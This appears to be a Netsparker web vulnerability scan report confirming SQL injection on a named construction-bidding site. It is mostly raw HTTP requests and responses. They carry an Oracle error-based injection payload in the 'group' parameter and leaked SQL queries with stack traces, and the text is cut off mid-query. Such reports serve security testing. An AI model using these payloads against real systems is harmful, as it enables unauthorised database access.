XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript InjectionNetsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
67
identified
30
confirmed
25
critical
10
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
CRITICAL
37 %
IMPORTANT
31 %
MEDIUM
4 %
LOW
12 %
INFORMATION
15 %
|
|
SQL Injection
SQL Injection
8
TOTAL
CRITICAL
CONFIRMED
8
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, Updating and Deleting arbitrary data from the database
- Executing commands on the underlying operating system
- Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
- See the remedy for solution.
- If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
- Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
- Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.
Remedy
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| group | GET | (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:32 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:32 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10911
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:54.944 [ 1] (TP-Processor1820) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:32 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:32 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10911
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:54.944 [ 1] (TP-Processor1820) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| group | GET | (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?group=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&provider=765295 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:38 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:38 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11096
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:00.765 [ 1] (TP-Processor1866) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = 